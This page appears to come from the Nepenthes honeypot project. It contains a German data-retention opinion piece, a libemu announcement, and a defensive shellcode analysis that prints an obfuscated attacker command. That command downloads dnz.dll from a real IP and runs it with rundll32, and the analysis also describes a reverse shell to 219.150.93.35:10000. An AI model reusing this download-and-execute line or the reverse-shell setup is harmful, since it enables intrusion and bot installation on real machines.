Nepenthes - finest collection -

Welcome to the official nepenthes website! Nepenthes is a versatile tool to collect malware. It acts passively by emulating known vulnerabilities and downloading malware trying to exploit these vulnerabilities. Interested? Check our documentation and grab your copy.

Grab your copy from Sourceforge.

As a variety from usual news, today: german politics.

On friday the 9th November 2007 the german goverment will decide about new laws to protect the civilians from terror attacks. The new laws include:

1. telecommunication service providers including mobilservice and internet have to save
   1. number of the caller and callee
   2. start & end time of any call including timezone
   3. type of service
      1. in case of mobile services
         1. international number of caller and callee
         2. imsi identification of the mobiledevices of caller and callee
         3. the radio cell for caller and callee when starting the call
         4. in case of anonymous services, service activation time, radio cell
      2. in case of voip services, the ip address
2. same rules apply for short and multimedia message services, including the time when the messages were sent and received
3. email service providers
   1. when sending an email, email and ip address of the sender as well as the email address of the receipent
   2. when receiving email, the ip address of the sending “device”, the senders and receivers email address
   3. on access of a email box, the ip address of the accessor
   4. timestamps for all previous mentioned points including timezones
4. internet service providers
   1. the users ip address
   2. unique identifier of the access point
   3. the sessions start and endtime, including the timezones
5. providers of anonymization services save each ip session
6. providers of mobile services save the radio cells identifier to allow geographical locating

for six months

In short, all communication signatures get stored for half a year, because everybody is a suspect, a potential terrorist, the goverment has to keep track of.

As usual, once the data is available, we are talking about 40 petabytes for only one major provider, there will be requests to use it, it is expensive to record, so better use it somehow if you fail catching terrorists.
The Intellectual Property Economy would definitely love accessing the database, allowing them to sue software pirates in realtime.
You could get a call you have to pay some thousand for copyright infringement even before the damn mp3 finished.
Marketing, 100% transparent customers, the more you know about the stingy customers, the better you can promote your products.
Improve press, remove whistelblowers, you got their communication signature in your records.
Going to prison for controversy opinions gets possible again.

This surveillance act suspects every civilian of being terrorist, to protect the democracy.
Whats left of a democracy if it starts monitoring the whole population?
Even though there was no successful act of terrorism in germany during the last 20 years, terrorism won, the democracy lost when removing its cornerstone to protect itself of terrorism.

On the other hand, there is still no public available data which congressman is paid as a lobbyist, and congressman are on the exception list for all surveillance actions. It’s somehow part of human nature to proof power corrupts once you have it.

Click this link to enter the libemu homepage, download your copy, and enjoy the first open source shellcode detection engine using emulation.
It has been a lot of work, it took a lot of time and it is not complete yet, libemu based detection modules for honeytrap, nepenthes and snort are still todo.
In the meantime you can enjoy the great shellcode detection commandline utility sctest to detect and profile shellcodes in suspicious dumps and create graphs of it.

The Internet Stormcenter recently published a call for packets and asked for a shellcode analysis. We received the dump from the incidents handler William Salusky and here is the libemu result:

the shellcodes graph

The shellcode spawns a command prompt and connects this shell to 219.150.93.35 10000.

The server sends

cd wins & ECHO SEt P=cREAtEOBjEct("micROSOFt.xmL"^&X^&"http"):P.OpEn "gEt",wScRipt.ARgUmEntS(0),0:P.SEnd():SEt S=cREAtEOBjEct("AdOdB.S"^&X^&"tREAm"):S.mOdE=3:S.tYpE=1:S.OpEn():S.wRitE(P.RESpOnSEBOdY):S.SAvEtOFiLE wScRipt.ARgUmEntS(1),2 >lite.vbe
cmd.exe /c "cscript.exe lite.vbe http://61.129.112.73/images/menu/dnz.dll dnz.dll & rundll32 dnz.dll,ShellMain"

which gets executed by the attacked client. Removing the obfuscation, a file is downloaded from 61.129.112.73/images/menu/dnz.dll and stored as dnz.dll, which gets started by rundll32.

The file is an irc bot with very bad detection rates as of the virustotal run yesterday evening:

File dnz.dll received on 08.23.2007 21:05:21 (CET) Result: 4/32 (12.5%)

Additional information File size: 24064 bytes MD5: 60cad46ccc51fefbadd1d0874c1c26d2 SHA1: 1db02d6916122cc3065b86786c2a25a5eebd1af3

Apply patches in time, always.

For the completeness, here are the details

cat session_8016.5168.raw2 | /opt/libemu/bin/sctest -S -g -s 100000000
-G dox.dot
graph file dox.dot
success

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:661
emu_env_w32_hook_LoadLibrayA

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:517
emu_env_w32_hook_WSAStartup
WSAStartup version 2

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:461
emu_env_w32_hook_WSASocketA
SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0,
dwFlags=0);
socket 3

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:182
emu_env_w32_hook_connect
host 219.150.93.35 port 10000

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:134
emu_env_w32_hook_CreateProcessA

CreateProcessA
CreateProcess(pszImageName=0, pszCmdLine=22cc80, psaProcess=0,
psaThread=0, fInheritHandles=1, fdwCreate=0, pvEnvironment=0,
pszCurDir=0, psiStartInfo=22cc2c, pProcInfo=22cc70)
PROCESS_INFORMATION
{
        HANDLE hProcess=4711;
        HANDLE hThread=4712;
        DWORD dwProcessId=4713;
        DWORD dwThreadId=4714;
}
STARTUPINFO {
        DWORD cb=68;
        LPTSTR lpReserved=0x00000000;
        LPTSTR lpDesktop=0x00000000;
        LPTSTR lpTitle=0x00000000;
        DWORD dwX=0;
        DWORD dwY=0;
        DWORD dwXSize=0;
        DWORD dwYSize=0;
        DWORD dwXCountChars=0;
        DWORD dwYCountChars=0;
        DWORD dwFillAttribute=0;
        DWORD dwFlags=257;
        WORD wShowWindow=0;
        WORD cbReserved2=0;
        LPBYTE lpReserved2=0x080;
        HANDLE hStdInput=3;
        HANDLE hStdOutput=3;
        HANDLE hStdError=3;
}

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:815
emu_env_w32_hook_WaitForSingleObject
WaitForSingleObject(hHandle=17920,  dwMilliseconds=-1)

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:152
emu_env_w32_hook_closesocket

Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:789
emu_env_w32_hook_SetUnhandledExceptionFilter
Exception filter 7c800000
cpu error error accessing 0x7c81cdc7 not mapped

Older news can be found in the news archive.